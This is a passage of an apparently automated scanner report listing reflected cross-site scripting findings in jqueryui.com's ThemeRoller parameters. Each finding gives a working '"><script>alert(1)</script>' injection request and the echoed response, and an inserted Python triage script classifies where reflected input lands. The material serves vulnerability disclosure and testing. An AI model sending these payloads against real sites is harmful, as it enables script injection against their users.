HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...
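Every finding above rests on the same evidence: the canary string from the request reappears verbatim inside a double-quoted attribute in the response. The Python below is an added illustration, not code from the report's tooling or from jqueryui.com, that automates this check offline against a saved response body. It locates each verbatim copy of the canary, works out the parser context it landed in (text, inside a tag, or inside a double-quoted attribute value), names the tag and attribute, and returns a triage verdict that also distinguishes a real fix (the canary present only in HTML-encoded form) from a silent strip. The sample response and its "fixed" variant are constructed from the excerpt in finding 3.62; they are not captured traffic.

```python
import html
import re
from typing import Dict, List

# Constructed response fragment modelled on the excerpt in finding 3.62: the canary
# lands inside the double-quoted href of the <link> that loads parseTheme.css.php.
CANARY = '994f3"><script>alert(1)</script>03809dbf2df'
SAMPLE_BODY = (
    '<!DOCTYPE html>\n<html>\n<head>\n   <meta charset="UTF-8" />\n'
    '   <title>jQuery UI - ThemeRoller</title>\n'
    '   <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller'
    '&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0' + CANARY +
    '&opacityShadow=30&thicknessShadow=8px" type="text/css" media="all" />\n'
    '</head>\n<body></body>\n</html>\n'
)
# The same page after a hypothetical fix that HTML-encodes the attribute value.
FIXED_BODY = SAMPLE_BODY.replace(CANARY, html.escape(CANARY, quote=True))

TAG_OPEN = re.compile(r"<([a-zA-Z][\w:-]*)")
ATTR_OPEN = re.compile(r'([\w:-]+)\s*=\s*"[^"]*$')


def classify(body: str, canary: str) -> List[Dict[str, object]]:
    """Finds each verbatim copy of `canary` in `body` and works out where an HTML
    parser would be when it reaches it: text, inside a tag (unquoted), or inside a
    double-quoted attribute value (the case this report describes). `escapes` says
    whether the canary carries the character needed to leave that context."""
    hits = []
    start = 0
    while True:
        i = body.find(canary, start)
        if i < 0:
            return hits
        lt = body.rfind("<", 0, i)
        seg = body[lt:i] if lt >= 0 else ""      # from the last '<' up to the canary
        tag_m = TAG_OPEN.match(seg)
        unquoted = re.sub(r'"[^"]*"', "", seg)    # drop complete "..." pairs
        if not tag_m or ">" in unquoted:          # the tag closed before the canary
            ctx, tag, attr, escapes = "text", None, None, "<" in canary
        elif '"' in unquoted:                     # an opening quote with no close
            attr_m = ATTR_OPEN.search(seg)
            ctx, tag = "attr_dq", tag_m.group(1)
            attr, escapes = (attr_m.group(1) if attr_m else None), '"' in canary
        else:                                     # between attributes / unquoted value
            ctx, tag, attr = "tag", tag_m.group(1), None
            escapes = ">" in canary or " " in canary
        hits.append({"offset": i, "context": ctx, "tag": tag,
                     "attribute": attr, "escapes": escapes})
        start = i + len(canary)


def verdict(body: str, canary: str) -> str:
    """One-word triage result for a single request/response pair."""
    hits = classify(body, canary)
    if any(h["escapes"] for h in hits):
        return "reflected_unencoded_breakout"
    if hits:
        return "reflected_unencoded"
    if html.escape(canary, quote=True) in body:
        return "reflected_encoded"
    return "not_reflected"


if __name__ == "__main__":
    for h in classify(SAMPLE_BODY, CANARY):
        print(h)                                   # context attr_dq, tag link, attribute href
    print(verdict(SAMPLE_BODY, CANARY))            # reflected_unencoded_breakout
    print(verdict(FIXED_BODY, CANARY))             # reflected_encoded
```

Run it against the full saved response rather than the report's excerpt, and keep the canary exactly as submitted, random prefix and suffix included, so that ordinary occurrences of alert(1) or of the parameter's normal value in the page do not produce false positives. A "reflected_encoded" verdict after a fix is the result to look for; "not_reflected" after a fix usually means the value was stripped or the request was rejected, which is worth a second look rather than a pass.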

3.68. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2587"><script>alert(1)</script>912a8c95f83 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef80"><script>alert(1)</script>7d60f528328 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1081b"><script>alert(1)</script>32da48d3a73 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.71. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e3d"><script>alert(1)</script>e48f9fe676e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.72. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cd7"><script>alert(1)</script>fc8cfd864d1 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

3.73. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f05c"><script>alert(1)</script>260217d18f0 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.74. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0dc"><script>alert(1)</script>0438cc2541 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.75. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200d2"><script>alert(1)</script>efe4a57817 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
